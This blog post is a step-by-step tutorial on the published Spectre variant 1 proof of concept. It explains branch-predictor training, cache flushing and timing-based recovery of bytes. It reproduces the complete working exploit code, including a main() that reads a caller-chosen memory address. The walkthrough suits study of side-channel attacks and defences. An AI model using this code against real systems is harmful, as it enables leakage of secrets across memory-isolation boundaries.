• Intel: Spectre & Meltdown side-channel attacks (Part 2)


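The previous post introduced the basic principles of Spectre & Meltdown and a simple demo. Today we continue with the original POC published by the team that discovered the vulnerability, which appears in the appendix of the Spectre paper: https://spectreattack.com/spectre.pdf 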

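1. First, the output of a run, to give an intuitive picture: as the printed results show, the contents of the secret string were recovered successfully.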

      

2. A detailed walkthrough of the code

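(1) The two functions at the core of the exploit, rdtscp and clflush, are declared in these headers (intrin.h for MSVC, x86intrin.h for GCC/Clang):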

    #ifdef _MSC_VER
    #include <intrin.h> /* for rdtscp and clflush */
    #pragma optimize("gt", on)
    #else
    #include <x86intrin.h> /* for rdtscp and clflush */
    #endif

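(2) array1: the array through which the attacker reaches the victim's memory. It is declared with 160 bytes, but the bounds check in victim_function uses array1_size (16). Later an index far beyond that bound is passed in, so that array1[x] lands on the victim's memory (secret).

unused1 and unused2: padding. On a multi-core CPU each core has its own L1 and L2 caches, and caches are managed in units of cache lines, 64 bytes each on the processors named in the comments. unused1 and unused2 are exactly one cache line each, and array1 (160 bytes) spans at least 3 lines.

If each array starts on a line boundary, the three arrays together occupy 5 distinct cache lines. The compiler and linker decide the actual placement and alignment, so this separation is a best effort, not a guarantee.

array2: the probe array. A secret byte is a single byte, so its value is 0..255, which gives 256 slots (the "rows"). Slots are 512 bytes apart. Note that 512 is a byte stride equal to 8 cache lines of 64 bytes; it is not the 512 bits contained in one 64-byte line. The stride gives every possible byte value its own cache line, and the distance between neighbouring slots is presumably meant to keep the hardware prefetcher from pulling in adjacent slots.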

    uint8_t unused1[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
    uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };//a shared memory space between the victim and the attacker
    uint8_t unused2[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
    uint8_t array2[256 * 512];//(1) each secret byte is 1 byte, so its value is 0..255 (256 slots); (2) slots are 512 bytes apart, i.e. 8 cache lines of 64 bytes, so each value maps to its own cache line; (3) shared with the attacker and victim
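To make the layout concrete, here is a small sketch that maps a byte value v to the array2 offset and cache line the victim's load would touch. It assumes 64-byte cache lines and that array2 starts on a line boundary; probe_offset, probe_line and the constant names are made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Assumption: 64-byte cache lines, as on the processors named in the POC comments. */
#define LINE_SIZE 64u
#define PROBE_STRIDE 512u /* the POC's array2 stride, in bytes */

/* Byte offset inside array2 that is touched when the secret byte equals v. */
static size_t probe_offset(uint8_t v) { return (size_t)v * PROBE_STRIDE; }

/* Cache-line index (relative to a line-aligned array2) touched for value v. */
static size_t probe_line(uint8_t v) { return probe_offset(v) / LINE_SIZE; }

/* Whole cache lines between two neighbouring probe slots. */
static size_t lines_between_slots(void) { return PROBE_STRIDE / LINE_SIZE; }
```

For example, the first secret character 'T' (0x54) maps to offset 0x54 * 512 = 43008, i.e. line 672 of array2, and neighbouring values are always 8 lines apart.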

                       

(3) This is the victim's data, i.e. the data the attack tries to recover:

    char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover

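(4) victim_function. Architecturally, the bounds check (x < array1_size, with array1_size = 16) rejects any out-of-range x, yet later calls pass an x far beyond array1's declared 160 bytes. When the branch is mispredicted, the CPU speculatively reads array1[x] (a byte of secret) and then touches array2[array1[x] * 512], which loads that line into the cache. Once the misprediction is detected, the CPU discards the speculative results and restores register state, but the cache line stays loaded.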

    uint8_t temp = 0; /* ensure the compiler does not remove the victim_function() at compilation time*/
    // In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
    void victim_function(size_t x)
    {
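        if (x < array1_size)//array1_size is not cached and must be fetched from memory, which is slow, so the CPU speculatively executes the statement below
        {
            temp &= array2[array1[x] * 512];//array1 has 160 bytes (bounds check: 16), but x can be far larger, e.g. malicious_x from main, which reaches into secret's memory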
        }
    }
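The mechanism can be mimicked in a few lines of portable C. This is a toy software model, not an exploit: toy_cpu and toy_victim are made-up names, predicted_taken stands in for the branch predictor, reg stands in for register state, and the 256-entry cached[] array stands in for the probe lines of array2.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Toy model for illustration only; real speculation happens inside the CPU. */
typedef struct {
    bool cached[256]; /* cached[v]: probe line array2[v * 512] is in the cache */
    uint8_t reg;      /* architectural (register) state */
} toy_cpu;

/* mem models a buffer whose first array1_size bytes are array1, followed by
 * other data (e.g. a secret); in this model x must stay inside mem. */
static void toy_victim(toy_cpu *cpu, const uint8_t *mem, size_t x,
                       size_t array1_size, bool predicted_taken)
{
    bool taken = x < array1_size;   /* the real bounds check */
    if (!taken && !predicted_taken)
        return;                     /* correctly predicted not-taken: body never runs */

    uint8_t saved = cpu->reg;
    uint8_t v = mem[x];             /* array1[x]: may be past array1_size */
    cpu->cached[v] = true;          /* touching array2[v * 512] fills one line */
    cpu->reg = v;

    if (!taken)
        cpu->reg = saved;           /* misprediction: register state is restored... */
    /* ...but cpu->cached[] is left as is: that is the side channel. */
}
```

Calling toy_victim with an out-of-bounds x and predicted_taken = true leaves reg unchanged but marks cached[secret byte], which is what the timing loop in step (10) later detects.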

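(5) The threshold for deciding whether an access hit the cache. It was found empirically over many runs rather than derived from theory, so it will likely need adjusting on a different CPU.

    #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold; 80 was found by experiment, not derived from theory */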
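The POC hard-codes 80. One possible way to choose a value for your own machine, sketched here as an assumption rather than the authors' method, is to time a batch of accesses to a line known to be cached and a batch to a line just flushed (for example with __rdtscp around each access, as in step (10)), then place the threshold halfway between the two medians. pick_threshold and median_u64 are hypothetical helpers that take the samples you collected.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median of n > 0 samples; sorts the array in place. */
static uint64_t median_u64(uint64_t *s, size_t n)
{
    qsort(s, n, sizeof *s, cmp_u64);
    return (n % 2) ? s[n / 2] : s[n / 2 - 1] + (s[n / 2] - s[n / 2 - 1]) / 2;
}

/* Hypothetical helper: threshold halfway between the median hit latency and
 * the median miss latency (both in timer ticks, measured by the caller). */
static uint64_t pick_threshold(uint64_t *hits, size_t nh,
                               uint64_t *misses, size_t nm)
{
    uint64_t h = median_u64(hits, nh);
    uint64_t m = median_u64(misses, nm);
    return (m > h) ? h + (m - h) / 2 : h; /* no usable gap: fall back to h */
}
```

Medians are used instead of means so that an occasional interrupt or context switch during a measurement does not drag the threshold upward.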

(6) Reset the per-value counters that record cache hits:

    for (i = 0; i < 256; i++)
            results[i] = 0;

(7) Flush every probe slot of array2 from the CPU cache, so that lines left over from earlier accesses do not distort the later timing:

    for (i = 0; i < 256; i++)//flush every probe slot from the cache
                _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

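(8) Evict array1_size from the CPU cache, so that the bounds check in the next victim_function call has to wait for a slow memory read, which gives the CPU time to execute the if body speculatively. The empty loop right after it makes sure the flush has completed: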

     _mm_clflush(&array1_size);//evict array1_size from the cache
     for (volatile int z = 0; z < 100; z++)//ensure the flush is done, and the processor does not re-order it; volatile keeps the compiler from optimizing this empty loop away
     {/* Delay (can also mfence) */
     } 

(9) Next, x (the offset into array1) is computed. The bit twiddling is hard to follow from the code alone, so it helps to print some values first:

    x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
    x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
    x = training_x ^ (x & (malicious_x ^ training_x));
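The resulting x values follow a regular pattern with a period of 6. In each period, five values equal training_x (7 in this run, because tries % array1_size = 999 % 16 = 7), which is within array1_size, so the if condition holds. The sixth value (j % 6 == 0) is malicious_x, far beyond array1_size, so the condition fails. The branch predictor, however, learns from this branch's recent history: five taken outcomes in a row "train" it to predict the sixth as taken too, so the CPU executes temp &= array2[array1[x] * 512] ahead of time and loads a line indexed by the victim's byte into the cache. The selection is done with bit operations instead of an if, to avoid jumps that might tip off the branch predictor. The values of x passed to victim_function() were: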
    j=23 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=22 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=21 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=20 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=19 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=18 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224
    j=17 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=16 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=15 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=14 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=13 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
    j=12 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224
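To check the pattern without relying on the log, the three statements can be pulled into a standalone function. The name select_x is ours; the bit operations are copied from the POC, and j is assumed to be non-negative, as it is in the loop.

```c
#include <stddef.h>

/* Branch-free selection as in the POC: returns malicious_x when j % 6 == 0,
 * otherwise training_x. Assumes j >= 0. */
static size_t select_x(int j, size_t training_x, size_t malicious_x)
{
    /* j % 6 == 0: (-1) & ~0xFFFF = 0x...FFFF0000; otherwise 0..4 & ~0xFFFF = 0 */
    size_t x = ((j % 6) - 1) & ~0xFFFF;
    /* fill the low 16 bits: all ones (i.e. -1) if j % 6 == 0, else still 0 */
    x = (x | (x >> 16));
    /* mask all ones -> malicious_x, mask 0 -> training_x */
    return training_x ^ (x & (malicious_x ^ training_x));
}
```

With 30 iterations (j = 29..0), j % 6 == 0 holds for j = 24, 18, 12, 6 and 0, so 5 of the 30 calls are attack calls, each preceded by 5 training calls.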

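(10) After the victim_function calls, each probe slot of array2 is read and timed. An access at or below CACHE_HIT_THRESHOLD counts as a cache hit and adds one point to that byte value; over many tries, the value whose slot keeps hitting is the byte the victim loaded speculatively. The value array1[tries % array1_size] is skipped, because the training calls legitimately cached its slot and it would otherwise score a false hit.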

    /* Time reads. Order is lightly mixed up to prevent stride prediction */
            for (i = 0; i < 256; i++)
            {    
                mix_i = ((i * 167) + 13) & 255;//(1) scramble the probe order so the CPU cannot predict the access pattern; (2) & 255 keeps the low 8 bits, which equals % 256 for non-negative values
                addr = &array2[mix_i * 512];
                time1 = __rdtscp(&junk); /* READ TIMER */
                junk = *addr; /* MEMORY ACCESS TO TIME */
                time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
                if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                    results[mix_i]++; /* cache hit - add +1 to score for this value */
            }
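The probe order can be checked in isolation. Because 167 is odd, multiplication by 167 is invertible modulo 256, so i -> (i * 167 + 13) & 255 is a permutation: all 256 slots are still probed, only in a scrambled order. A small check, with mix_index and is_permutation_of_256 as illustrative names:

```c
#include <stdbool.h>

/* The POC's probe order for i = 0..255. */
static int mix_index(int i) { return ((i * 167) + 13) & 255; }

/* Returns true if mix_index visits each of 0..255 exactly once. */
static bool is_permutation_of_256(void)
{
    bool seen[256] = { false };
    for (int i = 0; i < 256; i++) {
        int m = mix_index(i);
        if (seen[m])
            return false; /* some slot would be probed twice */
        seen[m] = true;
    }
    return true;
}
```

The first probes go to slots 13, 180, 91, ..., so consecutive reads are never a fixed small stride apart.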

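(11) Next, find the two byte values with the most cache hits (the best guess and the runner-up), and stop early once the best one clearly wins: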

    /* Locate highest & second-highest results results tallies in j/k */
            j = k = -1;
            for (i = 0; i < 256; i++)
            {
                if (j < 0 || results[i] >= results[j])
                {
                    k = j;
                    j = i;
                }
                else if (k < 0 || results[i] >= results[k])
                {
                    k = i;
                }
            }
            if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
                break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
        }
        results[0] ^= junk; /* use junk so code above won't get optimized out*/
        value[0] = (uint8_t)j;
        score[0] = results[j];
        value[1] = (uint8_t)k;
        score[1] = results[k];
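The ranking and the stop rule can be lifted out of readMemoryByte into two functions. top_two and clear_winner are illustrative names; the logic is the POC's. Because of the >= comparisons, ties go to the later index.

```c
#include <stdbool.h>

/* j = index with the highest count, k = runner-up (same scan as the POC). */
static void top_two(const int results[256], int *best, int *second)
{
    int j = -1, k = -1;
    for (int i = 0; i < 256; i++) {
        if (j < 0 || results[i] >= results[j]) {
            k = j; /* old leader becomes runner-up */
            j = i;
        } else if (k < 0 || results[i] >= results[k]) {
            k = i;
        }
    }
    *best = j;
    *second = k;
}

/* POC's early-exit rule: best >= 2 * runner-up + 5, or exactly 2 vs 0. */
static bool clear_winner(const int results[256], int j, int k)
{
    return results[j] >= (2 * results[k] + 5) ||
           (results[j] == 2 && results[k] == 0);
}
```

For instance, 12 hits against 3 passes (12 >= 11), while 8 against 4 does not (8 < 13), so the attack would keep trying in the second case.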

(12) Back in main: this is the offset from array1 to the target memory:

    size_t malicious_x = (size_t)(secret - (char*)array1); 

It is then passed to readMemoryByte to probe the byte at that offset, and incremented after each byte:

    printf("Reading at malicious_x = %p... ", (void*)malicious_x);
            readMemoryByte(malicious_x++, value, score);
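The malicious_x in the sample output of step (9), 18446744073707453224, is 2^64 minus 2,098,392: in that run secret sat about 2 MB below array1 (plausibly because the string literal lives in a read-only data section placed before the writable arrays), so the subtraction wrapped around. Adding the wrapped offset back to array1 wraps around again and lands on secret. A minimal sketch of that arithmetic with uintptr_t, assuming a flat address space where size_t and uintptr_t have the same width; offset_from and resolve are made-up helper names. Strictly, ISO C leaves pointer arithmetic across separate objects undefined; the POC relies on the compiler emitting plain address arithmetic.

```c
#include <stddef.h>
#include <stdint.h>

/* Offset from base to target stored as an unsigned size_t, as the POC does.
 * If target lies below base, the difference wraps to a huge value. */
static size_t offset_from(const void *base, const void *target)
{
    return (size_t)((uintptr_t)target - (uintptr_t)base);
}

/* Adding the wrapped offset back to base wraps around again to target. */
static uintptr_t resolve(const void *base, size_t offset)
{
    return (uintptr_t)base + (uintptr_t)offset;
}
```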

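(13) Compared with the POC at https://www.cnblogs.com/theseventhson/p/13282921.html, this demo adds two capabilities:

•  It trains (misleads) the CPU's branch predictor so that it predicts the next if condition as true and executes the if body ahead of time.
•  Besides reading secret, it lets the user specify the target address and the number of bytes to read:
        if (argc == 3)//argv[1] is the target address, argv[2] is the number of bytes to read
        {
            sscanf_s(argv[1], "%p", (void**)(&malicious_x));
            malicious_x -= (size_t)array1; /* convert the absolute address into an offset from array1 */
            sscanf_s(argv[2], "%d", &len);
            printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);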
        }

The complete code follows (the key points are in the comments):

    #include <stdio.h> 
    #include <stdint.h>
    #include <string.h>
    #ifdef _MSC_VER
    #include <intrin.h> /* for rdtscp and clflush */
    #pragma optimize("gt", on)
    #else
    #include <x86intrin.h> /* for rdtscp and clflush */
    #endif
    
    /* sscanf_s only works in MSVC. sscanf should work with other compilers */
    #ifndef _MSC_VER
    #define sscanf_s sscanf
    #endif
    
    /********************************************************************
    Victim code.
    ********************************************************************/
    unsigned int array1_size = 16;
    uint8_t unused1[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
    uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };//a shared memory space between the victim and the attacker
    uint8_t unused2[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
    uint8_t array2[256 * 512];//(1) each secret byte is 1 byte, so its value is 0..255 (256 slots); (2) slots are 512 bytes apart, i.e. 8 cache lines of 64 bytes, so each value maps to its own cache line; (3) shared with the attacker and victim
    
    char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover
    
    uint8_t temp = 0; /* ensure the compiler does not remove the victim_function() at compilation time*/
    // In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
    void victim_function(size_t x)
    {
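        if (x < array1_size)//array1_size is not cached and must be fetched from memory, which is slow, so the CPU speculatively executes the statement below
        {
            temp &= array2[array1[x] * 512];//array1 has 160 bytes (bounds check: 16), but x can be far larger, e.g. malicious_x from main, which reaches into secret's memory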
        }
    }
    
    /********************************************************************
    Analysis code
    ********************************************************************/
    #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold; 80 was found by experiment, not derived from theory */
    
    /* Report best guess in value[0] and runner-up in value[1] */
    void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
    {
        static int results[256];//cache-hit count for each candidate byte value
        int tries, i, j, k, mix_i;
        unsigned int junk = 0;
        size_t training_x, x;
        register uint64_t time1, time2;
        volatile uint8_t* addr;
    
        for (i = 0; i < 256; i++)
            results[i] = 0;
        for (tries = 999; tries > 0; tries--)
        {
            /* Flush array2[256*(0..255)] from cache */
            for (i = 0; i < 256; i++)//flush every probe slot from the cache
                _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
    
            /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
            training_x = tries % array1_size;//training_x = 0~15
            for (j = 29; j >= 0; j--)
            {
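                _mm_clflush(&array1_size);//evict array1_size from the cache
                for (volatile int z = 0; z < 100; z++)//ensure the flush is done, and the processor does not re-order it; volatile keeps the compiler from optimizing this empty loop away
                {/* Delay (can also mfence) */
                } 
                /* In every 6 iterations, 5 produce a small x that satisfies the if condition and the 6th produces a huge x that fails it. Because the previous 5 were taken, the CPU still executes the if body speculatively: the 5 small x values train the branch predictor so that the 6th call can "fool" it */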
                /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
                /* Avoid jumps in case those tip off the branch predictor */
                x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
                x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
                x = training_x ^ (x & (malicious_x ^ training_x));
    
                /* Call the victim! */
                victim_function(x);//x is an offset from array1 and can reach into secret
            }
    
            /* Time reads. Order is lightly mixed up to prevent stride prediction */
            for (i = 0; i < 256; i++)
            {    
                mix_i = ((i * 167) + 13) & 255;//(1) scramble the probe order so the CPU cannot predict the access pattern; (2) & 255 keeps the low 8 bits, which equals % 256 for non-negative values
                addr = &array2[mix_i * 512];
                time1 = __rdtscp(&junk); /* READ TIMER */
                junk = *addr; /* MEMORY ACCESS TO TIME */
                time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
                if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                    results[mix_i]++; /* cache hit - add +1 to score for this value */
            }
    
            /* Locate highest & second-highest results results tallies in j/k */
            j = k = -1;
            for (i = 0; i < 256; i++)
            {
                if (j < 0 || results[i] >= results[j])
                {
                    k = j;
                    j = i;
                }
                else if (k < 0 || results[i] >= results[k])
                {
                    k = i;
                }
            }
            if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
                break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
        }
        results[0] ^= junk; /* use junk so code above won't get optimized out*/
        value[0] = (uint8_t)j;
        score[0] = results[j];
        value[1] = (uint8_t)k;
        score[1] = results[k];
    }
    
    int main(int argc, const char** argv)
    {
    printf("Putting '%s' in memory, address %p\n", secret, (void*)(secret));
    size_t malicious_x = (size_t)(secret - (char*)array1); /* default for malicious_x: offset from array1 to secret; it depends on where the linker places the two objects and wraps around if secret lies below array1 */
        int score[2], len = strlen(secret);
        uint8_t value[2];
    
        for (size_t i = 0; i < sizeof(array2); i++)//array2[256 * 512]
            array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
    if (argc == 3)//argv[1] is the target address, argv[2] is the number of bytes to read
    {
        sscanf_s(argv[1], "%p", (void**)(&malicious_x));
        malicious_x -= (size_t)array1; /* convert the absolute address into an offset from array1 */
        sscanf_s(argv[2], "%d", &len);
        printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);
    }

    printf("Reading %d bytes:\n", len);
        while (--len >= 0)
        {
            printf("Reading at malicious_x = %p... ", (void*)malicious_x);
            readMemoryByte(malicious_x++, value, score);
            printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
            printf("0x%02X='%c' score=%d ", value[0],
                (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
            if (score[1] > 0)
                printf("(second best: 0x%02X='%c' score=%d)", value[1],
                    (value[1] > 31 && value[1] < 127 ? value[1] : '?'),
                    score[1]);
        printf("\n");
        }
    #ifdef _MSC_VER
    printf("Press ENTER to exit\n");
        getchar();    /* Pause Windows console */
    #endif
        return (0);
    }

References: https://www.fortinet.com/blog/threat-research/into-the-implementation-of-spectre (code walkthrough)

https://bbs.pediy.com/thread-254288.htm, https://xz.aliyun.com/t/6332 (leaking sensitive information across processes)

https://bbs.pediy.com/thread-256190.htm (research on L3 cache side-channel analysis of Intel processors)

  • Original URL: https://www.cnblogs.com/theseventhson/p/13296154.html